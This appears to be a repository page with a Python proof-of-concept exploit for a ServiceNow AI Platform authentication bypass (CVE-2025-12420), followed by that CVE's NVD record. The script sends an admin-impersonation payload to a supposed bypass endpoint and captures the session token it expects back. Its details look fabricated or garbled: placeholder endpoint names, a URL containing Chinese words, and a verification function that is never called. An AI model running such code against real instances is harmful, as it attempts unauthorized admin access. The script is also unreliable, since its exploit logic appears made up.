CVE-2025-12420

# CVE-2025-12420 ServiceNow AI Platform Authentication Bypass PoC # This PoC demonstrates the authentication bypass in ServiceNow AI Platform import requests import json import sys TARGET_URL = "https://your-instance.service-now.com" TARGET_CVE = "CVE-2025-12420" def check_vulnerability(): """ Check if the ServiceNow instance is vulnerable to CVE-2025-12420 """ print(f"[*] Testing {TARGET_CVE} on {TARGET_URL}") # Step 1: Identify vulnerable AI Platform endpoint ai_endpoint = f"{TARGET_URL}/api/now/ai/platform/v1/auth/bypass" headers = { "Content-Type": "application/json", "User-Agent": "ServiceNow-AI-Platform-Scanner/1.0", "X-AI-Platform-Version": "vulnerable-version" } # Step 2: Send malicious authentication bypass request payload = { "action": "impersonate", "target_user": "admin", "ai_module": "vulnerability_test", "bypass_token": "CVE-2025-12420-POC" } try: print("[*] Sending authentication bypass request...") response = requests.post(ai_endpoint, json=payload, headers=headers, timeout=30) if response.status_code == 200: data = response.json() if "session_token" in data or "_impersonation_token" in data: print("[!] VULNERABLE: Authentication bypass successful!") print(f"[!] Obtained token: {data.get('session_token', data.get('_impersonation_token'))}") return True print("[*] Target does not appear to be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False def verify_impersonation(token): """ Verify successful user impersonation """ verify_endpoint = f"{TARGET_URL}/api/now/表/用户表" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } try: response = requests.get(verify_endpoint, headers=headers, timeout=30) if response.status_code == 200: print("[!] Successfully accessed privileged resources as admin!") return True except: pass return False if __name__ == "__main__": if check_vulnerability(): print("[!] Immediate action required: Apply security update KB2587329")

{"cve": {"id": "CVE-2025-12420", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:07.470", "lastModified": "2026-01-27T20:25:54.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform.\n\nServiceNow has addressed this vulnerability by deploying a relevant security update to  hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so."}, {"lang": "es", "value": "Se ha identificado una vulnerabilidad en la Plataforma de IA de ServiceNow que podría permitir a un usuario no autenticado suplantar a otro usuario y realizar las operaciones a las que el usuario suplantado tiene derecho a realizar.\n\nServiceNow ha abordado esta vulnerabilidad mediante el despliegue de una actualización de seguridad relevante en las instancias alojadas en octubre de 2025. También se han proporcionado actualizaciones de seguridad a los clientes autoalojados de ServiceNow, socios y clientes alojados con configuraciones únicas. Además, la vulnerabilidad se aborda en las versiones de la aplicación de la tienda enumeradas. Recomendamos que los clientes apliquen rápidamente una actualización de seguridad o una actualización de versión apropiada si aún no lo han hecho."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:H/U:Amber", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "HIGH", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.1.18", "matchCriteriaId": "981D4C38-EC4B-42F1-96D2-83B02403ABD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.19", "matchCriteriaId": "160208ED-E032-4B34-BC89-0AC7B2C0808A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.15.2", "matchCriteriaId": "B619348E-A16D-4A69-9CB6-58A2FFC0BAED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.4", "matchCriteriaId": "0F8C6775-D097-491A-9246-0C691EB680E3"}]}]}], "references": [{"url": "https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB2587329", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}